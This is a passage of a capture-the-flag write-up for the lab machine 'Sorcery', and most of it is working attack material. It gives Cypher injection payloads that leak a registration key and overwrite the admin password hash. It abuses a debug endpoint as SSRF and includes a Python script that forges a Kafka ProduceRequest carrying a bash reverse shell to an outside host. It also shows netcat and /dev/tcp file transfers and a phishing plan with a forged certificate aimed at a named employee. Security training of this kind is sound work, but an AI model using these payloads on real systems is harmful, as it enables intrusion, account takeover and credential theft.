- get_all.rs — filters unauthorized results post-fetch.
- get_one.rs — blocks access to an unauthorized product even if the ID matches.
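The visibility rule is small enough to express as a single predicate; a Python rendering of the same logic (enum values taken from the Rust UserPrivilegeLevel definition, dict shapes are mine):

```python
CLIENT, SELLER, ADMIN = 0, 1, 2  # from UserPrivilegeLevel

def should_show_for_user(product: dict, claims: dict) -> bool:
    # Same three-way OR as the Rust method
    return (
        product["is_authorized"]
        or claims["privilege_level"] == ADMIN
        or product["created_by_id"] == claims["id"]
    )

unauthorized = {"is_authorized": False, "created_by_id": "seller-1"}
assert should_show_for_user(unauthorized, {"id": "seller-1", "privilege_level": SELLER})   # creator
assert should_show_for_user(unauthorized, {"id": "anyone", "privilege_level": ADMIN})      # admin
assert not should_show_for_user(unauthorized, {"id": "other", "privilege_level": CLIENT})  # everyone else
```

Note that a Seller who did not create the product is treated like a Client here — only the admin sees everything, which is exactly why the admin-bot rendering flow in insert.rs is interesting.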
Dns (RCE)
get.rs
A request to GET /api/dns returns internal DNS entries stored in memory, when authenticated:
pub fn get_entries(_guard1: RequireAdmin, _guard2: RequirePasskey)
Requires both:
- RequireAdmin → the JWT must have privilege_level = Admin
- RequirePasskey → the user must have authenticated using WebAuthn (with_passkey = true)
This is a high-privilege endpoint. Only admin+passkey users can access. The backend internally uses a shared DNS list (likely for host resolution), and admins can view it.
update.rs
Access to POST /api/dns is also tightly restricted:
pub fn update_dns(
_guard1: RequireAdmin,
_guard2: RequirePasskey,
kafka_store: &State<KafkaStore>,
)
It sends a raw Kafka message with value "/dns/convert.sh" to topic update:
let mut producer = kafka_store.producer.lock().unwrap();
match producer.send(&Record {
topic: "update",
partition: -1,
key: (),
value: "/dns/convert.sh".as_bytes(),
}) {
Ok(_) => Ok(Json(Response {})),
Err(_) => Err(AppError::Unknown),
}
The DNS content update comes from some system reacting to the update Kafka topic, executing or processing /dns/convert.sh, which may be leaked via the /debug endpoint.
main.rs
This main.rs reveals an RCE sink of the entire DNS service.
It acts as a Kafka consumer-producer loop:
- Consumes from Kafka topic
update - Executes the message as a bash command
- After execution, it reads a file (
/dns/entries), parses it into a list ofEntryobjects, and - Publishes the updated entry list (as JSON) to topic
get
This line is the actual vulnerability at line 66:
let mut process = match Command::new("bash").arg("-c").arg(command).spawn()
The command comes directly from the Kafka message value, received from the update topic — no validation or sanitization is performed.
This means any user who can produce a Kafka message to update can execute arbitrary shell commands in the dns container.
The execution flow starts at line 60.
It first consumes a Kafka message from update:
let Ok(command) = str::from_utf8(message.value)
If the payload is valid UTF-8, it is treated as a bash command.
Then execute that command:
Command::new("bash").arg("-c").arg(command).spawn()
Read the updated DNS entries from /dns/entries:
let config = fs::read_to_string("/dns/entries")
Parse them into Entry structs and serialize into JSON:
let value = serde_json::to_string(&entries)
Publish to the Kafka get topic:
producer.send(&Record { topic: "get", ... })
With Kafka write access, we can therefore send a message to the update topic with the value:
bash -c 'touch /tmp/hacked'
The dns container will execute the command, then read /dns/entries and push a new JSON list to the get topic.
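To make the sink concrete, here is a minimal Python sketch of what the consumer loop effectively does with each message value. The helper name handle_update_message is ours, and we run a harmless echo rather than the real payload; it assumes bash is available, mirroring the container's behavior:

```python
import subprocess

def handle_update_message(value: bytes) -> str:
    """Mirror of the dns consumer: decode the Kafka value as UTF-8
    and hand it straight to `bash -c` — no validation whatsoever."""
    command = value.decode("utf-8")
    result = subprocess.run(["bash", "-c", command], capture_output=True, text=True)
    return result.stdout

# a harmless stand-in for `touch /tmp/hacked`
print(handle_update_message(b"echo pwned-by-kafka"))
```

Anything that can be written after `bash -c` — including a reverse shell one-liner — runs with the worker's privileges.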
Debug (SSRF)
We should definitely look into how the debug endpoint works.
Frontend
Under frontend/src/app/dashboard/debug/page.tsx we see:
async function _DebugPage() {
return <DebugClientPage />;
}
export default async function DebugPage<T>(props: T) {
const Component = await requireAuth(_DebugPage, 2).then(requirePasskey);
return <Component {...props} />;
}Only logged-in users with privilege level ≥ 2 (admin) can access, and they must also have WebAuthn registered and verified — so this is likely admin or high-trust area.
The debug dashboard renders from frontend/src/app/dashboard/debug/page-client.tsx. From line 25, we know that we can send arbitrary data to any host:port:
host: z.string().min(1),
port: z.coerce.number().min(0).max(65535),
data: [{ value: string }]
This means we can connect to internal services and perform protocol-aware fuzzing, e.g.:
{ "host": "127.0.0.1", "port": 8000, "data": ["GET / HTTP/1.1\r\nHost: localhost\r\n\r\n"] }
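Since the backend sends our bytes raw and hex-encodes whatever comes back, the client-side encoding is easy to script. A small sketch — the sample response hex below is an illustrative value, not captured traffic:

```python
# build the raw HTTP probe for the debug endpoint's `data` field
http_probe = b"GET / HTTP/1.1\r\nHost: localhost\r\n\r\n"
hex_payload = http_probe.hex()          # what travels over the SSRF channel

# the response arrives hex-encoded; decode it back to readable bytes
sample_response_hex = "485454502f312e3120323030204f4b"  # illustrative value
decoded = bytes.fromhex(sample_response_hex).decode()
print(decoded)  # HTTP/1.1 200 OK
```

The same encode/decode pair works for any binary protocol, which is what makes the endpoint useful against Kafka later on.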
Backend
The backend/src/api/debug/debug.rs confirms everything we suspected — and more.
If we can access the debug page, we have a full TCP SSRF primitive plus an XSS sink: a raw TCP socket to any host:port combo — user-controlled:
TcpStream::connect(format!("{}:{}", data.host, data.port))
We can send arbitrary binary data:
hex::decode(request)
The server optionally reads all response bytes (e.g., HTML, SSH banners, internal APIs):
stream.read_to_end(&mut result)
and returns the data as hex (the frontend must decode it):
hex::encode(&result)
We can reach internal IPs and services, or forge fake DNS updates by targeting the dns service in the same docker-compose setup.
Cypher Injection
Injection Point
User registration works even without a Registration Key, landing us a low-privileged Client account.
As always, packet inspection is the opening move. Logging in with username and password triggers a second POST request — which drops a JWT token into our lap:

Decode the JWT for inspection:
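The payload segment of a JWT is just base64url-encoded JSON, so no third-party tooling is needed. A small sketch — the token below is fabricated for illustration, though the claim names privilege_level and with_passkey match what the backend guards check:

```python
import base64
import json

def jwt_claims(token: str) -> dict:
    """Decode the (unverified) payload segment of a JWT."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)       # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))

# fabricated token for demonstration only
claims = {"privilege_level": "Client", "with_passkey": False}
fake_token = "header." + base64.urlsafe_b64encode(
    json.dumps(claims).encode()).rstrip(b"=").decode() + ".signature"

print(jwt_claims(fake_token))
```

Note this only inspects the claims; it does not verify the signature.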

Once authenticated, we breach the dashboard — sandboxed to client-only features. We poke at the Passkey functionality:

But the silence from the network tells the story: no request, no access.
Heads up! Some features are only available for sellers or admins.
We're restricted to viewing stores by id (look at the unusual (id) HTML layout). But here's the twist — the request handler is vulnerable to Cypher Injection (Ref-Hook-1).

A clean request to GET /dashboard/store/<id> yields a Graph map payload:

The Next.js frontend dispatches this through /api/product/<id>, hardcoded in frontend/src/app/dashboard/store/[product]/page.tsx at line 13:
const response = await API().get(`product/${params.product}`);
If we reload the page directly, the network trace captures the actual HTML response instead of the async JSON returned by JavaScript fetches:

Structure Query
We toss the request into Burp Repeater and inject a lone double quote ("), as introduced in the Cypher writeup — the response coughs up a 500 Internal Server Error:

Injection point validated.
The backend dynamically composes Cypher queries like:
MATCH (result: Product { id: "some-id" }) RETURN result
Confirmed in the source (Ref-Hook-2):
let query_string = format!(
r#"MATCH (result: {} {{ {}: "{}" }}) RETURN result"#,
#struct_name, #name_string, #name
);
For instance, when invoking:
Product::get_by_id(id.to_owned()).await
It translates to:
MATCH (result: Product { id: "user_input" }) RETURN result
Our payload needs to break out of:
{ id: "user_input" }
We aim to surgically break out of the quoted string and append our own query logic. A payload like:
" }) RETURN result//
would reconstruct and terminate the original query cleanly, yielding:
MATCH (result: Product { id: "<id>" }) RETURN result// " }) RETURN result
Of course, this must be URL-encoded to slip past GET request filters:
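The encoding itself is mechanical — for example, with Python's urllib:

```python
from urllib.parse import quote

payload = '" }) RETURN result//'
# encode everything, including "/", since the payload travels in a URL path segment
encoded = quote(payload, safe="")
print(encoded)  # %22%20%7D%29%20RETURN%20result%2F%2F
```

The encoded string is then appended to /api/product/ in place of a product ID.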

However, there's a snag — the backend rejects unknown IDs with a 404. A malformed or non-existent ID kills the injection early, regardless of syntax.
To bypass that, we craft a syntactically valid query that retains the original match and piggybacks an additional clause, which should be akin to:
MATCH (result: ...) ... RETURN result
Per the Neo4j manual, OPTIONAL MATCH is our ticket in:
"}) OPTIONAL MATCH (u:User) RETURN result { .*, description: u.username }//
This leaves a valid query that never trips the 404 error handler:
MATCH (result: Product { id: "8f056c44-df4a-4b15-b2c5-466536bed3cd" })
OPTIONAL MATCH (u:User)
RETURN result { .*, description: u.username }
// " }) RETURN result
And it works:

The server leaks the username from the first User node — admin.
User is a globally defined structure (Ref-Hook-3), not directly printable, but we can leverage Cypher's property projection to exfiltrate nested data:
- RETURN result { .* } grabs all fields from result, and
- u.username extracts a specific attribute from the injected User node.
The value is dumped into the description field of the Product struct, per backend/src/db/models/product.rs:
#[derive(Model, Serialize, Deserialize)]
pub struct Product {
    pub id: String,
    pub name: String,
    pub description: String,
    pub is_authorized: bool,
    pub created_by_id: String,
}
We could just as well leak into name or id — same trick, different field.
Leak Registration Key
Our current bottleneck: we can't activate the Passkey flow without escalating to a Seller or admin.
From the code (Ref-Hook-4), registration_key is parsed as an optional during signup. If provided and valid (Ref-Hook-5), it unlocks elevated privileges.
We track its origin via a quick grep:
$ grep -rn 'registration_key' infrastructure
infrastructure/backend/src/db/connection.rs:27: configs.remove(0).registration_key
infrastructure/backend/src/db/connection.rs:34: registration_key: String,
infrastructure/backend/src/db/connection.rs:44: registration_key: Uuid::new_v4().to_string(),
infrastructure/backend/src/api/auth/register.rs:17: registration_key: Option<String>,
infrastructure/backend/src/api/auth/register.rs:30: registration_key,
infrastructure/backend/src/api/auth/register.rs:41: privilege_level: if registration_key.is_some()
infrastructure/backend/src/api/auth/register.rs:42: && &registration_key.unwrap() == REGISTRATION_KEY.get().await
The key entry lies in backend/src/db/connection.rs at line 34:
#[derive(Deserialize, Model)]
struct Config {
is_initialized: bool,
registration_key: String,
}
Translation: it's tucked inside a global Config node.
Therefore, with the same technique we used to leak the admin username, we can leak this attribute from the first Config node:
"}) OPTIONAL MATCH (c:Config) RETURN result { .*, description: c.registration_key }//
Hit confirmed:

Leaked registration_key from the Config node:
dd05d743-b560-45dc-9a09-43ab18c7a513
We use it to create a Seller account:

Now elevated, new options unlock — like uploading a product.
Still, this isn't the admin yet. But we're not done.
The intended path from here would be exploiting XSS to escalate to the admin user.
Argon Hash
Let's leak the hashed password of admin:
"}) OPTIONAL MATCH (u:User) RETURN result { .*, description: u.password }//
And there it is:

Confirmed in code (Ref-Hook-6) — hashed via Argon2.
$argon2id$v=19$m=19456,t=2,p=1$T+K9waOashQqEOcDljfe5Q$X5Yul0HakDZrbkEDxnfn2KYJv/BdaFsXn7xNwS1ab8E
Instead of brute-forcing it, we overwrite it.
Before that, let's break down the format of an Argon2 hash:
$argon2id$v=VERSION$m=MEMORY,t=ITERATIONS,p=PARALLELISM$BASE64_SALT$BASE64_HASH
So in our case:
| Component | Value |
|---|---|
| Algorithm | Argon2id |
| Version | 19 (0x13) |
| Memory | 19,456 KB (~19 MB) |
| Iterations | 2 |
| Parallelism | 1 thread |
| Salt | Random, 16 bytes |
| Hash | Output of KDF, 32 bytes |
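The breakdown above can be verified by splitting the leaked hash on $ — a small sketch, with parse_argon2 as our own helper name:

```python
def parse_argon2(encoded: str) -> dict:
    """Split a PHC-format Argon2 string into its components."""
    _, alg, version, params, salt, digest = encoded.split("$")
    opts = dict(kv.split("=") for kv in params.split(","))
    return {
        "algorithm": alg,
        "version": int(version.split("=")[1]),
        "memory_kib": int(opts["m"]),
        "iterations": int(opts["t"]),
        "parallelism": int(opts["p"]),
        "salt_b64": salt,
        "hash_b64": digest,
    }

admin_hash = ("$argon2id$v=19$m=19456,t=2,p=1"
              "$T+K9waOashQqEOcDljfe5Q$X5Yul0HakDZrbkEDxnfn2KYJv/BdaFsXn7xNwS1ab8E")
print(parse_argon2(admin_hash))
```

Any replacement hash we write back must keep the same parameter block so the backend's verifier accepts it.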
Generate a same-style hash via https://argon2.online/ for a simple password such as 123456, using the same parameters — 19456 KB memory, 2 iterations, 1 thread, a 32-byte hash — and a random salt:
$argon2i$v=19$m=19456,t=2,p=1$WmFnWGxlYkJ5cEVIT21USA$FJbW2hb66gDJzSEiqLR9iJXj4AxdShErsvhL+/zjJ5s
Payload to overwrite admin's password:
"}) MATCH (u:User {username: "admin"}) SET u.password= "$argon2i$v=19$m=19456,t=2,p=1$WmFnWGxlYkJ5cEVIT21USA$FJbW2hb66gDJzSEiqLR9iJXj4AxdShErsvhL+/zjJ5s" RETURN result { .*, description: "Admin password hijacked" } AS result //
Boom:

We wait for it to sync. Then log in as admin with password 123456:

And we have full access to all the features on the web application.
Passkeys & WebAuthn
Next phase: we weaponize the Passkey feature to breach the Debug endpoint (Ref-Hook-7).

As outlined in this guide, Passkeys are phishing-resistant credentials, built on public key cryptography, not secrets. They're part of the FIDO2 spec stack, with WebAuthn being the web-facing standard.
In this Rust-based app, WebAuthn support implies:
- FIDO2-compatible login
- Backed by asymmetric keypairs
- Using Authenticators (external, internal, or virtual — which is our vector)
Passkeys are the credentials. WebAuthn is the protocol that makes them work in-browser.
Chrome Devtools
Since WebAuthn is active (Ref-Hook-7), we simulate a Passkey device using DevTools, according to the Official Chrome Developer documentation.
First, we press F12 to open DevTools in Chrome, then click the three-dot menu in the top-right corner of DevTools: More tools → WebAuthn:

Then check Enable virtual authenticator environment, and click "Add" with:
- Protocol: CTAP2 (modern and secure)
- Transport: USB (you can also try internal or nfc if needed)
- Supports resident keys: Yes (important for passkey-style login)
- User verification: Yes (simulates Face ID / fingerprint)

Now the browser pretends it's holding a real hardware token.
We enroll at /api/webauthn/passkey/register/start (Ref-Hook-8) — and this time, the system hands back a valid Passkey ID:

We log out, then back in — now with the freshly bound Passkey:

With Debug now unlocked, we gain visibility — and potentially interaction — with all internal services enumerated in docker-compose.yml (Ref-Hook-9).
Kafka RCE
Finally, we're in position to exploit SSRF via the unlocked debug endpoint.
Mechanism
From docker-compose.yml, we observe the architecture involves a Kafka message broker linked to a dns worker:
kafka:
restart: always
build: kafka
environment:
CLUSTER_ID: pXWI6g0JROm4f-1iZ_YH0Q
KAFKA_NODE_ID: 1
KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: CONTROLLER:PLAINTEXT,PLAINTEXT:PLAINTEXT
KAFKA_LISTENERS: PLAINTEXT://kafka:9092,CONTROLLER://kafka:9093
KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://kafka:9092
KAFKA_PROCESS_ROLES: broker,controller
KAFKA_CONTROLLER_QUORUM_VOTERS: 1@kafka:9093
KAFKA_CONTROLLER_LISTENER_NAMES: CONTROLLER
healthcheck:
test: ["CMD", "bash", "-c", "cat < /dev/null > /dev/tcp/kafka/9092"]
interval: 5s
timeout: 10s
retries: 5
dns:
restart: always
build: dns
environment:
WAIT_HOSTS: kafka:9092
KAFKA_BROKER: ${KAFKA_BROKER}
This already suggests the dns service is Kafka-bound, awaiting instructions from the broker.
The exploit path becomes clear after auditing the Dns feature (Ref-Hook-10).
In backend/src/api/dns/update.rs, any request to POST /api/dns triggers the backend to publish a Kafka message to topic update:
topic: "update",
value: "/dns/convert.sh".as_bytes()
The Kafka payload value is just a string — a file path or command — which the dns worker consumes.
The RCE sink resides in dns/main.rs (Ref-Hook-11):
let Ok(command) = str::from_utf8(message.value) else {
continue;
};
Command::new("bash").arg("-c").arg(command).spawn()
This means:
- If the Kafka message isn't valid JSON (i.e., not a serialized DNS config), it still gets parsed as a string.
- That string is executed directly via bash -c.
⚠️ No validation, no filtering, no sandbox.
Before the command is run, the program attempts to deserialize the payload as Vec<DnsEntry> (Ref-Hook-12):
let Ok(entries) = serde_json::from_slice::<Vec<DnsEntry>>(message.value) else {
continue;
};
But if that fails, the fallback hits: the message gets reinterpreted as a shell command.
This gives us two execution paths:
- Valid JSON array → update DNS entries
- Invalid JSON / raw string → passed directly to bash -c → RCE
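The dispatch logic can be sketched in a few lines of Python (the names are ours; the real implementation is Rust with serde):

```python
import json

def dispatch(value: bytes) -> str:
    """Mimic the dns worker's two paths: JSON entry list vs. raw shell string."""
    try:
        entries = json.loads(value)
        if isinstance(entries, list):
            return "update-dns-entries"
    except ValueError:          # json.JSONDecodeError subclasses ValueError
        pass
    return "execute-with-bash"

print(dispatch(b'[{"name":"git.sorcery.htb","value":"127.0.0.1"}]'))  # update-dns-entries
print(dispatch(b"bash -c 'touch /tmp/hacked'"))                       # execute-with-bash
```

Any message that fails to parse as an entry list falls through to the shell — which is exactly the path we want.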
So the exploit boils down to sending a Kafka message to topic update like:
topic: "update"
value: b"bash -c '<arbitrary_command>'"
If we can route that message internally — via SSRF through the debug endpoint — the dns service will run it blindly.
💡 This delivers full command execution inside the DNS container.
As a side note, we can observe:

The DNS records shown in the frontend (via GET /api/dns) come from Kafka too — read from topic get, and returned as JSON like:
{"entries":[{"name":"git.sorcery.htb","value":"127.0.0.1"}, ...]}
Overall:
- The Kafka broker is the message control plane.
- The dns service acts on update messages, either as config JSON or as shell commands.
- We can hijack that flow to achieve unfiltered RCE in the DNS container.
This is a textbook message queue injection → shell execution escalation path:
+---------------------+ Kafka Broker +---------------------+
| Attacker Control |--------------------------------->| Topic: "update" |
| (via SSRF or API) | (Send: "bash -c ...") | Receives message |
+---------------------+ +---------------------+
|
v
+-----------------------------+
| DNS Service |
| (main.rs, loop on messages) |
+-----------------------------+
|
| if valid JSON:
| parse as Vec<DnsEntry>
| else:
| treat as raw string
v
+------------------------------+
| bash -c "COMMAND_HERE" |
| (Direct shell execution) |
+------------------------------+
|
v
+----------------------------+
| /dns/entries updated |
| or arbitrary command run |
+----------------------------+
|
v
+---------------------------+
| Kafka Topic: "get" |
| (Contains DNS entries) |
+---------------------------+
|
v
+-------------------------------------+
| Web App API (e.g. GET /api/dns) |
| Reads from "get" topic and returns |
+-------------------------------------+
What's left is crafting the exact Kafka protocol payload we'll need to inject through SSRF.
Exploit
We've confirmed: any Kafka message pushed to topic update with raw text like bash -c 'curl http://x' gets executed on the DNS container.
So the plan is simple:
- Forge a Kafka ProduceRequest
- Send it to kafka:9092 via SSRF through the debug endpoint
- Payload: bash -c 'bash -i >& /dev/tcp/10.10.13.2/4444 0>&1'
1. Capture Raw TCP Kafka Request
Run tcpdump on our host to intercept the raw TCP stream:
sudo tcpdump -i br-854d707442d8 port 9092 -w kafka-msg.pcap
Ensure we're listening on the correct Docker bridge.
2. Locally Run Kafka + kafkacat
Launch Kafka locally with kaf.sh:
#!/bin/bash
# Step 1: Create network if not exists
sudo docker network inspect kafka-net >/dev/null 2>&1 || docker network create kafka-net
# Step 2: Start Kafka container (with internal Zookeeper)
sudo docker run -d --rm --name zookeeper \
--network kafka-net \
-e ZOOKEEPER_CLIENT_PORT=2181 \
confluentinc/cp-zookeeper:7.5.0
sleep 5
sudo docker run -d --rm --name kafka \
--network kafka-net \
-e KAFKA_BROKER_ID=1 \
-e KAFKA_ZOOKEEPER_CONNECT=zookeeper:2181 \
-e KAFKA_LISTENERS=PLAINTEXT://0.0.0.0:9092 \
-e KAFKA_ADVERTISED_LISTENERS=PLAINTEXT://kafka:9092 \
-e KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR=1 \
confluentinc/cp-kafka:7.5.0
echo "[*] Waiting for Kafka to become ready..."
sleep 10
# Step 3: Publish a message to the 'update' topic
# [!] Replace this with actual payload, e.g., RCE string
PAYLOAD="bash -c \"/bin/sh -i >& /dev/tcp/10.10.13.3/4444 0>&1\""
echo "[*] Sending payload: $PAYLOAD"
echo "$PAYLOAD" | sudo docker run -i --rm --name kafkacat \
--network kafka-net \
edenhill/kafkacat:1.6.0 \
-b kafka:9092 -t update -P
echo "[+] Done."
Once the message is sent, stop tcpdump — we've captured the traffic:

3. Extract the Raw TCP Payload
Open kafka-msg.pcap in Wireshark.
- Right-click on a TCP segment → Follow TCP Stream
- Select direction: Client → Server (red), since we want only the Kafka ProduceRequest message
- Format: Raw
- Save to payload.bin

The saved stream payload.bin may look like:
$rdkafka
librdkafka1.5.0rdkafkaupdaterdkafkaupdaterdkafkaupdateymGiwTwTvjbash -c '/bin/sh -i >& /dev/tcp/10.10.13.3/4444 0>&1'
Convert it to a hex string (for SSRF at the Debug endpoint):
xxd -p payload.bin | tr -d '\n'
Which gives a hex-encoded Kafka ProduceRequest like:
000000240012000300000001000772646b61666b61000b6c696272646b61666b6106312e352e30000000001e0003000400000002000772646b61666b61000000010006757064617465010000001e0003000400000003000772646b61666b6100000001000675706461746501000000aa0000000700000004000772646b61666b61ffffffff0000138800000001000675706461746500000001000000000000007900000000000000000000006d000000000247b66996000000000000000001977754e788000001977754e788ffffffffffffffffffffffffffff0000000176000000016a62617368202d6320272f62696e2f7368202d69203e2620xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1362e382f3434343420303e26312700
We've successfully extracted a valid Kafka ProduceRequest (for topic update) that injects a reverse shell.
Or we can refer to this post and generate a request matching the Kafka protocol as follows:
import struct
import binascii

class KafkaProduceRequest:
    def __init__(self, topic, message, client_id="", partition=0, correlation_id=1):
        self.topic = topic
        self.message = message.encode()
        self.client_id = client_id
        self.partition = partition
        self.correlation_id = correlation_id

    def _build_header(self):
        api_key = 0  # Produce
        api_version = 0
        header = struct.pack(">hhI", api_key, api_version, self.correlation_id)
        header += struct.pack(">h", len(self.client_id)) + self.client_id.encode()
        header += struct.pack(">hI", -1, 30000)  # acks = -1, timeout = 30000ms
        return header

    def _build_topic_block(self):
        topic_block = struct.pack(">i", 1)  # One topic
        topic_block += struct.pack(">h", len(self.topic)) + self.topic.encode()
        topic_block += struct.pack(">i", 1)  # One partition
        topic_block += struct.pack(">i", self.partition)
        topic_block += self._build_message_set()
        return topic_block

    def _build_message_set(self):
        null_key = struct.pack(">i", -1)
        value = struct.pack(">i", len(self.message)) + self.message
        magic = struct.pack("BB", 0, 0)
        message = magic + null_key + value
        crc = binascii.crc32(message) & 0xffffffff
        kafka_message = struct.pack(">I", crc) + message
        message_set = struct.pack(">qI", 0, len(kafka_message)) + kafka_message
        return struct.pack(">i", len(message_set)) + message_set

    def build(self):
        full_body = self._build_header() + self._build_topic_block()
        return struct.pack(">i", len(full_body)) + full_body

    def to_hex(self):
        return binascii.hexlify(self.build()).decode()

if __name__ == "__main__":
    """ Construct reverse shell payload """
    ip = "10.10.13.3"
    port = 4444
    shell_command = f"bash -c '/bin/sh -i >& /dev/tcp/{ip}/{port} 0>&1'"
    req = KafkaProduceRequest(topic="update", message=shell_command)
    print("Hex-encoded Kafka ProduceRequest:\n")
    print(req.to_hex())
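The v0 wire framing built by _build_message_set can be sanity-checked offline: each message is a CRC32 over magic + attributes + key + value, and each message-set entry prefixes that with an 8-byte offset and a 4-byte size. A minimal sketch (helper name ours):

```python
import struct
import binascii

def kafka_v0_message(value: bytes) -> bytes:
    """Frame one Kafka v0 message: CRC32 + magic + attributes + null key + value."""
    body = (struct.pack("BB", 0, 0)                    # magic byte, attributes
            + struct.pack(">i", -1)                    # null key
            + struct.pack(">i", len(value)) + value)   # length-prefixed value
    crc = binascii.crc32(body) & 0xFFFFFFFF
    return struct.pack(">I", crc) + body

value = b"bash -c 'id'"
msg = kafka_v0_message(value)
# message set entry = offset (8 bytes) + message size (4 bytes) + message
message_set = struct.pack(">qI", 0, len(msg)) + msg
```

If the CRC or a length prefix is wrong, the broker silently drops the produce, so verifying this framing locally saves a lot of blind SSRF attempts.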
4. Use SSRF to Replay RCE
Now we launch the final payload using the SSRF-capable /debug endpoint, targeting the internal Kafka broker.
We direct the request to kafka:9092 (known by docker-compose.yml):

The Kafka broker receives our forged ProduceRequest, and the dns container consumes it — blindly executing the payload via bash -c.
As expected, we catch a reverse shell as the unprivileged user inside the isolated Docker container:

USER
Blog
In the Blog section of the web application, we see two posts:
Phishing Training
Hello, just making a quick summary of the phishing training we had last week. Remember not to open any link in the email unless: a) the link comes from one of our domains (<something>.sorcery.htb); b) the website uses HTTPS; c) the subdomain uses our root CA. (the private key is safely stored on our FTP server, so it can't be hacked).
Phishing awareness
There has been a phishing campaign that used our Gitea instance. All of our employees except one (looking at you, @tom_summers) have passed the test. Unfortunately, Tom has entered their credentials, but our infosec team quickly revoked the access and changed the password. Tom, make sure that doesn't happen again! Follow the rules in the other post!
This shows the way to our phishing exploit:
- Tom was the only one who fell for the phishing campaign: “All of our employees except one (looking at you, @tom_summers) have passed the test.”
- He entered credentials into a fake Gitea instance: “Tom has entered their credentials, but our infosec team quickly revoked the access.”
- They have strict phishing awareness criteria:
  - Only accept links from *.sorcery.htb
  - HTTPS only
  - Must use their root CA
This implies that the bad boy tom_summers could be the target. Our phishing plan is:
- Set up a fake Gitea site on something like evil.sorcery.htb
  - Use HTTPS
  - Sign a TLS cert with the RootCA.key + RootCA.crt obtained from FTP
- Poison DNS
  - Map gitea.sorcery.htb or evil.sorcery.htb to our phish server
- Send the phishing link via the internal mail bot
  - To [email protected]
  - Include a "Gitea login expired" or "Security update" lure
- Capture credentials
  - Use a simple HTML login clone or mitmproxy with credential capture
Let's go.
File Transfer Trick
Inside the container, we spot an executable named dns:
user@7bfb70ee5b9c:/app$ ls -l dns
-rwxr-xr-x 1 root root 1167088 Oct 30 2024 dns
user@7bfb70ee5b9c:/app$ cat dns
ELF>@p@8@"!@@PPPPPe+
e+
A binary blob — standard Linux ELF.
Since outbound tools like curl or wget are absent, we fall back to the classic TCP file transfer with netcat.
First, grab a static busybox binary:
wget https://busybox.net/downloads/binaries/1.21.1/busybox-x86_64
Then serve it from the attacker machine:
nc -lvnp 12345 < busyboxOn the reverse shell, execute:
bash -c 'cat < /dev/tcp/10.10.13.3/12345 > /tmp/busybox' &
chmod +x /tmp/busybox
Now we have nc and other core tools in one binary.
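The /dev/tcp redirection trick is nothing more than a raw TCP byte stream. Both ends can be sketched locally in Python over loopback (helper names ours, port chosen automatically):

```python
import socket
import threading

def serve_bytes(srv: socket.socket, data: bytes) -> None:
    """Sender side — what `nc -lvnp <port> < file` does."""
    conn, _ = srv.accept()
    conn.sendall(data)
    conn.close()

def fetch_bytes(host: str, port: int) -> bytes:
    """Receiver side — what `cat < /dev/tcp/<host>/<port> > file` does."""
    chunks = []
    with socket.create_connection((host, port)) as cli:
        while chunk := cli.recv(4096):
            chunks.append(chunk)
    return b"".join(chunks)

srv = socket.socket()
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("127.0.0.1", 0))          # any free port
srv.listen(1)
port = srv.getsockname()[1]

payload = b"\x7fELF...pretend-binary..."
t = threading.Thread(target=serve_bytes, args=(srv, payload))
t.start()
received = fetch_bytes("127.0.0.1", port)
t.join()
srv.close()
assert received == payload
```

The transfer is complete when the sender closes the connection — there is no framing or integrity check, so comparing file hashes afterwards is a good habit.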
Use the same trick in reverse to transfer the dns file to our attack machine:
# On our attacker machine (listener)
nc -lvnp 9001 > dns_dumped
# On the victim machine (reverse shell):
/tmp/busybox nc 10.10.13.3 9001 < /app/dns &
After downloading, we see the binary is not stripped:
$ file dns_dumped
dns_dumped: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=696b266b795f17414a0afb318c1bd923a7c52bdf, for GNU/Linux 3.2.0, not stripped
That makes reversing easy. It turns out to be just the compiled Infrastructure project, but we may still dig into the runtime binary for hard-coded secrets.
Additionally, there's a wait binary under /:
user@7bfb70ee5b9c:/app$ ls -l /
...
-rwxr-xr-x 1 root root 506040 Sep 27 2023 wait
Stripped. No symbols. No help strings.
Its name implies a service listener or Kafka trigger — possibly phishing-related, or hooked into the bot behavior.
Service Scan
Now we can also use wget from busybox to upload a static nmap binary and perform an IP scan:
Nmap scan report for 172.19.0.1
Host is up (0.0013s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
443/tcp open https
Nmap scan report for services-gitea-1.services_default (172.19.0.2)
Host is up (0.00042s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open unknown
Nmap scan report for 7bfb70ee5b9c (172.19.0.3)
Host is up (0.0017s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
53/tcp open domain
Nmap scan report for services-ftp-1.services_default (172.19.0.4)
Host is up (0.049s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
21/tcp open ftp
Nmap scan report for services-mail_bot-1.services_default (172.19.0.5)
Host is up (0.0010s latency).
All 65535 scanned ports on services-mail_bot-1.services_default (172.19.0.5) are closed
Nmap scan report for services-backend-1.services_default (172.19.0.6)
Host is up (0.00079s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
8000/tcp open unknown
Nmap scan report for services-frontend-1.services_default (172.19.0.7)
Host is up (0.00078s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
3000/tcp open unknown
Nmap scan report for services-nginx-1.services_default (172.19.0.8)
Host is up (0.0011s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
443/tcp open https
Nmap scan report for services-kafka-1.services_default (172.19.0.9)
Host is up (0.0013s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE
8082/tcp open unknown
9092/tcp open unknown
9093/tcp open unknown
33869/tcp open unknown
40195/tcp open unknown
Nmap scan report for services-mail-1.services_default (172.19.0.10)
Host is up (0.00092s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
1025/tcp open unknown
8025/tcp open unknown
Nmap scan report for services-neo4j-1.services_default (172.19.0.11)
Host is up (0.00083s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
7474/tcp open unknown
7687/tcp open unknown
